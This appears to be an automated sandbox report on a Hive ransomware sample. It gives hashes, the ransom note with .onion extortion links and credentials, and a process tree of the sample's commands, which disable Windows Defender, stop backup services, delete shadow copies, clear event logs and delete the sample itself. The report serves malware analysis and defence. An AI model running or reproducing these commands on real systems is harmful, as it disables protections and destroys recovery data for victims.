Overview

overview

10

Static

static

3

2025-03-12...ch.exe

windows7-x64

10

2025-03-12...ch.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    12/03/2025, 01:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe

  • Size

    3.7MB

  • MD5

    074ce128e23528f00e98eac6ae9a6618

  • SHA1

    39b2c91abb87af6399a7befab2fc100a03631258

  • SHA256

    04371796ab1e77b188bf8f1007466552b2faf7176918f3e0b6ce499d3ba57411

  • SHA512

    1db6635586bd506d4ca98e6be8b759fcfb8f44b7b6c3a96abf62986e4be49b5a04e3003dc379c8ea28342b3837ba71a32fa598125b8af001faebed9d8a23d97e

  • SSDEEP

    24576:ajAj4d2Cc/8o+1WkGHIvl4Bw5vJULHsbDwPD9cAXVCEbEWBgvM7eTVVfR35e7xLP:ayxIZk9FO5e1lqd/E+e7CZti1D1f

Score
10/10
hivedefense_evasiondiscoveryevasionexecutionimpactransomwarespywarestealertrojan

Malware Config

Extracted

Path

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\yxjL_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: 1i7Cpkz1ZCc4 Password: rX7WMQu6mrF6DBtf4eM2 To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.vsbnw files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

    defense_evasion
  • Disables service(s) 3 TTPs
    defense_evasionexecution
  • Hive

    A ransomware written in Golang first seen in June 2021.

    ransomwarehive
  • Hive family
    hive
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
    defense_evasiontrojan
  • Modifies security service 2 TTPs 1 IoCs
    defense_evasion
  • Clears Windows event logs 1 TTPs 3 IoCs
    defense_evasionransomware
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Renames multiple (1917) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (5590) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Modifies Security services 2 TTPs 6 IoCs

    Modifies the startup behavior of a security service.

    defense_evasion
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe"
    1⤵
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1956
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "NetMsmqActivator" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "NetMsmqActivator" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2600
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3028
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SDRSVC" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3020
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SDRSVC" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2472
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SstpSvc" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2588
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SstpSvc" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2844
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "UI0Detect" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2252
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "UI0Detect" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2968
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "VSS" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "VSS" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2852
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "wbengine" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "wbengine" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2832
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "WebClient" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2288
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "WebClient" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2992
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "NetMsmqActivator" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2816
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "SamSs" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2260
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "SDRSVC" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2720
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "SstpSvc" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2864
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "UI0Detect" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:1904
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "VSS" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2008
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "wbengine" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:1612
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "WebClient" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2084
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies Security services
      PID:1948
    • C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1940
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender DisableAntiSpyware settings
      • System Location Discovery: System Language Discovery
      PID:1916
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1604
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1740
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      PID:2036
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:2756
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      PID:1244
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:1716
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:1476
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1896
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      2⤵
        PID:2684
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:316
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1692
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2788
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2876
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        2⤵
        • System Location Discovery: System Language Discovery
        PID:3044
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2656
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2176
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1224
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2452
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:716
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2676
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2248
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1616
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1420
      • C:\Windows\SysWOW64\reg.exe
        reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        2⤵
        • System Location Discovery: System Language Discovery
        PID:296
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:1012
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:2368
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:868
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:1468
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
        • Modifies security service
        • System Location Discovery: System Language Discovery
        PID:932
      • C:\Windows\SysWOW64\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
        • Modifies Security services
        PID:1572
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin.exe delete shadows /all /quiet
        2⤵
        • System Location Discovery: System Language Discovery
        • Interacts with shadow copies
        PID:2024
      • C:\Windows\SysWOW64\wevtutil.exe
        wevtutil.exe cl system
        2⤵
        • Clears Windows event logs
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1400
      • C:\Windows\SysWOW64\wevtutil.exe
        wevtutil.exe cl security
        2⤵
        • Clears Windows event logs
        • Suspicious use of AdjustPrivilegeToken
        PID:2520
      • C:\Windows\SysWOW64\wevtutil.exe
        wevtutil.exe cl application
        2⤵
        • Clears Windows event logs
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:916
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        wmic.exe SHADOWCOPY /nointeractive
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1720
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        wmic.exe shadowcopy delete
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:612
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2336
        • C:\Program Files\Windows Defender\MpCmdRun.exe
          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          3⤵
          • Deletes Windows Defender Definitions
          PID:2548
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
        2⤵
          PID:3060
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIOAVProtection $true
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2464
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2852
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableRealtimeMonitoring $true
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2832
        • C:\Windows\SysWOW64\notepad.exe
          notepad.exe C:\yxjL_HOW_TO_DECRYPT.txt
          2⤵
          • System Location Discovery: System Language Discovery
          • Opens file in notepad (likely ransom note)
          PID:3004
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe"
          2⤵
          • Deletes itself
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          PID:2860
          • C:\Windows\SysWOW64\PING.EXE
            ping.exe -n 5 127.0.0.1
            3⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:768

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Command and Scripting Interpreter

      2
      T1059

      PowerShell

      1
      T1059.001

      System Services

      1
      T1569

      Service Execution

      1
      T1569.002

      Windows Management Instrumentation

      1
      T1047

      Persistence

      Create or Modify System Process

      4
      T1543

      Windows Service

      4
      T1543.003

      Privilege Escalation

      Create or Modify System Process

      4
      T1543

      Windows Service

      4
      T1543.003

      Defense Evasion

      Direct Volume Access

      1
      T1006

      Impair Defenses

      4
      T1562

      Disable or Modify Tools

      2
      T1562.001

      Indicator Removal

      3
      T1070

      Clear Windows Event Logs

      1
      T1070.001

      File Deletion

      2
      T1070.004

      Modify Registry

      4
      T1112

      Credential Access

      Credentials from Password Stores

      1
      T1555

      Credentials from Web Browsers

      1
      T1555.003

      Unsecured Credentials

      1
      T1552

      Credentials In Files

      1
      T1552.001

      Discovery

      Remote System Discovery

      1
      T1018

      System Location Discovery

      1
      T1614

      System Language Discovery

      1
      T1614.001

      System Network Configuration Discovery

      1
      T1016

      Internet Connection Discovery

      1
      T1016.001

      Lateral Movement

      Collection

      Data from Local System

      1
      T1005

      Command and Control

      Exfiltration

      Impact

      Inhibit System Recovery

      2
      T1490

      Service Stop

      1
      T1489

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_OFF.GIF.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_AAAAAAAAAAA0.vsbnw
        Filesize

        341B

        MD5

        f4393bdb40865ebd0eddf5a27b87ddbd

        SHA1

        823b5e046d08576ac33517eaa93c61665edbb65c

        SHA256

        87ff13b6c9f725a3fb2e5c8ef524cc5819601e2d8331822333087a72dd035efb

        SHA512

        73a1db5a02928e2f903ffae6c477e7ce3d313048a0faf2216eeb9183db9e7406c2abfd8e36861f5a8a96eca220fe2d6a7771b84820ce27df232c944e56b62257

        Download Submit

      • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_ON.GIF.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_IAAAACAAAAA0.vsbnw
        Filesize

        222B

        MD5

        a875cf9caadc406392ad4bbde44fd55c

        SHA1

        847e6491a3699254781e581f107becea8812ffe5

        SHA256

        fff5db9fafe7d0264df2c4135ca0a6252f4f4bddfc7b62471c2cca0a3fbf5954

        SHA512

        5b2bbdb377737bd4892e41ad1127b5767af9d7d873300d065190d03e7a130810290bdd44500a01758c1305b7e0d50bfa5694dc188f60aabbff5a9f679fc4c036

        Download Submit

      • C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_F_COL.HXK.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_AAAAAAAAAAA0.vsbnw
        Filesize

        114B

        MD5

        b8fbbc73ddde31636552ab184b4e398f

        SHA1

        5cfbfaea56e979a07c083f2340b10a5894812d78

        SHA256

        3c3702253a4695b5bcb18a2565b1d49f9f32f5f9f2442fd1395197970fa34edb

        SHA512

        7f0f4b098e0d37ed403be8d54e2dcbc603791ddf00e3a21747c41ecfb829fdf664b6bddda8d51309e1229b197244a1d8ae23e1b3bf3348f99f84a7a8684db8d7

        Download Submit

      • C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_K_COL.HXK.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_IAAAACAAAAA0.vsbnw
        Filesize

        113B

        MD5

        db9742e49c49c505b293a84518e95fa5

        SHA1

        406dae0b226900aad2ad2e10d8366651b848c053

        SHA256

        1c17b95e5098adb0c0e06aac8a8c7c50c6a5ef1b696465d548c8a922f1d3a653

        SHA512

        974917a72b2b3b783bb0ffcbfe0058489ae65ac0aa71ae86d77195780aeb7800848a3158fbe7ad8ddf9b30145d8a1a2c66f72484305ccf363b7981f105be295b

        Download Submit

      • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\BUTTON.GIF.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_AAAAAAAAAAA0.vsbnw
        Filesize

        185B

        MD5

        973779cfa96b0be367e8718db325c4ba

        SHA1

        be1115e7d145c8181f82b66ed30b4d5dc60bdfb7

        SHA256

        09d2a546c57dc9fec8fd5efd059ab8e7e21d51f582fd678f05900efef154db0a

        SHA512

        baba3c85e1f49e2f3b1c26f3db0cedd7a340a67c8fd5ab80e70957418d658bf137ec32fe529c01f122b932a3961fd4739eb557588d239471aa84cdfe99aa9dfa

        Download Submit

      • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_OFF.GIF.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_IAAAACAAAAA0.vsbnw
        Filesize

        496B

        MD5

        94f8f9cbbc7c55b6035f08f846d39cee

        SHA1

        2dad7a9174aea6a26301a00a7d3277595cfdca8f

        SHA256

        f1b55bf40b6fa794c1e614aa75985258a88e2165bef91eff545438b85baa5c3f

        SHA512

        6dabc2f1cc7872cff3682bb1d4e852d97e69cc7ae232dc9dbbb0fb3333bc3e3d99e9e2a2478cce03875abf9d2f27be964220586ae146af41484f78c98509c53c

        Download Submit

      • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_AAAAAAAAAAA0.vsbnw
        Filesize

        1KB

        MD5

        52236cec3798df288705441118df4bcc

        SHA1

        1fd595c15b27c07a7185cc39bcbf66c52641e32c

        SHA256

        71e4d48ed4515f17faa6505256314a8d6022e103714193785e7fcd08a36a051d

        SHA512

        0c949c6cf7c1d61978ae838e266c845cb9990ae574d6f1e80d96c5f87db15bca354aa4499ea80fa7fb47c8734b0db55d581b8e8cda07e1664423f957ef5f91e7

        Download Submit

      • C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.SE.XML.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_IAAAACAAAAA0.vsbnw
        Filesize

        806B

        MD5

        fc9a01384283f760b245bafde02893ca

        SHA1

        27787bad85297baad51216df565e409dfac1d440

        SHA256

        7bdb5be38475510a7c05a3444b122a62e8cf4c05b35e656ca4deccce4a55d968

        SHA512

        a35db9e5336b752fdd25db32ee0584fcd93c9c366ab3119d1e5cdd235c8f77e44170fdf2ce6c182d02df750ed89b85926c2cf4bfd4b4f6d634ec0c20c100c0e0

        Download Submit

      • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\yxjL_HOW_TO_DECRYPT.txt
        Filesize

        1KB

        MD5

        45cfb934ec29f5e73f7e81fbcdb87581

        SHA1

        3599e538a33ea625641712350c34406d1ca27047

        SHA256

        2eb37477bce5aceb507003f28e068dd331c61c57c01b71eb15f5f8914fb0854d

        SHA512

        49757baf3f5e874431437efae14cdbda72fcd1c23d4d53a81b08afd08bc16f148acf7d2cc37f35975e7b9775be43e3e101d1ab084ab02d0ba3fa4793d066d42a

        Download Submit

      • C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_AAAAAAAAAAA0.vsbnw
        Filesize

        5KB

        MD5

        6b38156ab3966c88706e6c6a36aa0c91

        SHA1

        dbfb754cf33e583995b60cabe70f9e5e6013514f

        SHA256

        cf89293922a3395f157c1d100a25caad75d845401b0e285f2547bd13f0f6a4ae

        SHA512

        a3f44332535861175245ccc85b68be40974444159f53b4561aad5eefe4ea399bdc4ea9071e32b7f38fc050cf4aeaef5cff862fd576be5e8328d0e49bcc18e74d

        Download Submit

      • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_AAAAAAAAAAA0.vsbnw
        Filesize

        57B

        MD5

        adf99b54fd6f317b611320564167c305

        SHA1

        d3d80dd39b686e04bf31db6ac9335084e841ef73

        SHA256

        1b68454d53e781f8793547fde8fcb2f3b03b5c8134f37b9d8c4045cb8a5473f3

        SHA512

        65fb44cdaf01632d60ecf3b49ab1eb661982ee8b6a430dcf6d1e75789787c9e7356754cd071421ca44a1b32ab918be97a630b1b0ca722383eea56d40fa131642

        Download Submit

      • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_AAAAAAAAAAA0.vsbnw
        Filesize

        8KB

        MD5

        202ddee0f0fca55c043b44d09bfe2375

        SHA1

        0fc1234511599cb695726f107c36d317f4e4f263

        SHA256

        7bca2f8a9053cbfc536cb3db7b316311d06499c5ec3e83862860d98f15ec9aab

        SHA512

        0cd0b41a6d2943f42b2f4adb0bef02f5354904d2a10b2264d831f6650fd7519913f8cb377d827a904502b927e885ce84778f25fcc1ef14ac2f58eb211235c7a1

        Download Submit

      • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_AAAAAAAAAAA0.vsbnw
